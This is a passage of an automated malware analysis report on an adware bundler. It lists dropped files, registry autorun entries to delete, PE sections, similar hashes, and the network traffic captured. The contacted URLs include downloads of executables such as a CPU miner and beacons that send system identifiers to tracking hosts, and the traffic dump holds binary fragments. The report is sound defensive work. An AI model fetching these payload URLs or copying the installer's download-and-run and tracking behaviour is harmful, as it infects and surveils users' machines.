%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\walmart.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_plus.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%WinDir%\Tasks\DD109E04-9249-4175-ABE-CCF37DDE4282.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\forbes.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.exe (92831 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.exe (31991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.exe (1271 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.exe (24254 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh37.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\CPUFeatures.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf36.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF.tmp (17738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd33.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cmmdWriter[1].exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst21.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\df4a6a3ed77e60d6758afca091ca0c1f[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1D.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb27.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy18.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\VISWHQk[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3C.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\vos[1].htm (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc43.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\36e0f22eacad857de2cd3b76aedc24a7[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw13.tmp (979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr3D.tmp (15 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010082" = "%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010082.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe -runhelper"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 1183744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 1376256 | 1736 | 2048 | 2.02132 | 480f21bf3c105b20c6d2cb8598d0b16c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 335
a5b362eaa5107233922d116064150b18
158a98a822f798bdb94723f9e1935623
fa58b09759639026299fe8d086b5c09d
692c8facf0591a41e8cb4be1671df672
9811196d1d42348220f9e9a2f9a4e3e8
2fae92324f64572d31a3a7ecd0590ce6
8bb9a9dea9311671e06482f9ec5318aa
c0c5cc8755825eaba05a4d361348392f
9a443574ea12da2f8cf331a9ba2ee28e
13166571a71af6a4221b72622dab8807
e727b97c7a7678a5c01f34c2a5633e76
26ed1b8284dc924e77b7c0588b4520f3
95a41fde49afb72046898a866001a95e
d27ee18d95dc184ee4d8d3791e6417d5
94aa7dbedeb69b99e633b79adec3428c
45ca65981b3c3e945b0e4cdc53db9ba2
9dd75707a1f8bbbd934891ac2f866e65
10ae755adfe308553c6276bb9d613d8a
b323c58bf4a0d001d1bf5c1b38feb286
baf718169de2c21c4761d5bd89ceeb77
ef0e9610146fc74405f34052d9039905
b5dc32575ffddf1a282708692c1f8464
b1d062ed686634c53c4213299d30b201
8169c8044caee125abec9429691e9f96
4e35dd9d2147b707331ddb7e8211024d
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 107.21.122.166 |
hxxp://download-servers.com/SysInfo/Validate.exe | 50.7.184.170 |
hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.184.170 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.217 |
hxxp://download-servers.com/SysInfo/validator/timer.php | 50.7.184.170 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe | 54.239.168.183 |
hxxp://ipgeoapi.com/ | 50.16.215.101 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.201 |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.148.123 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_INI | 37.187.148.215 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.148.123 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.249.119 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_F11 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_FIN | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_COUNT1 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_DCOUNT1 | 37.187.148.215 |
hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe | 54.239.168.70 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 | |
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.105 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 | |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.239.168.211 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.239.168.211 |
hxxp://d1r531x3ryfc51.cloudfront.net/installers/bi_downloader/1441577004706/setup.exe | |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.42 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.10 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.133.50 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6423 | 54.231.34.4 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=2838 | 69.16.175.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=5132 | 54.231.34.4 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.133.50 |
hxxp://www.software-forus.com/CPUminer/Bundle_CPUminer.exe | 205.185.216.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.42 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 | 54.231.80.170 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6862 | 54.231.34.4 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 | 69.16.175.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=6473 | 54.231.34.4 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=1898 | 54.231.34.4 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 176.31.126.119 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=9431 | 54.231.34.4 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.125 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=c34de9db4800cc5c07ea55982373e9fd&rnd=933 | 54.231.34.4 |
hxxp://sub.spirlymo.com/installers/bi_downloader/1441577004706/setup.exe | 54.239.168.116 |
s3.amazonaws.com | 54.231.8.184 |
upd.adskyforever.com | 188.165.209.115 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=daa8ba6c6755c5f89ef7fd05d0b42046&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1441580331&ts=1441580329&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempss2A.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 06 Sep 2015 22:58:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /installer.gif?action=started&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2004 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Ph L8KCqr fTgFr6Z3FPfyglwWAukl4uQlqlv0jJ3jUyvpdOzS9MWhheluHfsT5pjtqCUYyoR8A=
x-amz-request-id: 6B70A93C98F7A06B
Date: Sun, 06 Sep 2015 22:58:43 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Ph L8KCqr fTgFr6Z3FPfyglwWAukl4uQlqlv0jJ3jUyvpdOzS9MWhheluHfsT5pjtqCUYyoR8A=..x-amz-request-id: 6B70A93C98F7A06B..Date: Sun, 06 Sep 2015 22:58:43 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59904
Connection: keep-alive
Server: nginx
Date: Thu, 23 Jul 2015 01:04:56 GMT
Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT
ETag: "525d9db2-ea00"
Expires: Thu, 23 Jul 2015 01:14:56 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 464
X-Cache: Hit from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: b4UaOZ_q4LnUR72ZuLerUS8zUrP39hyBqUkYKpAW4vIpOaI2_5D_3g==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I}.I..h...h...h..S....h..d....h..d....h..d....h..d....h...i.W.h..d....h..d....h..d....h.Rich..h.................PE..L.....]R...........!.........,......e........................................ ......9.....@.....................................................................0...................................`...@...............H............................text..._........................... ..`.rdata..5...........................@..@.data...x...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..Q.M..E..M....E...]...........U..Q.M..E.....].U..Q.M...]......U..Q.M..E........E...]..........U..Q.M..E..M.......]............U......M..E..8.t..M.........E....E......E...]...U..Q.M..E..M...3.;......].......U..Q.M..E.3..8........].........U..Q.M..E.P.M........M........E...].............U..Q.M..E........M.........]....U..Q.M..M.......E....t..M.Q.Z.......E...].......U...E.].........U..j.h....d.....PQ.....3.P.E.d......M..M........E......E........M.Q.M...........E......E..M.d......Y..].........U..Q.M..E.......
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:58:42 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40537
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1441580323.dop019.am4.t,1441580322.cds064.am4.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ 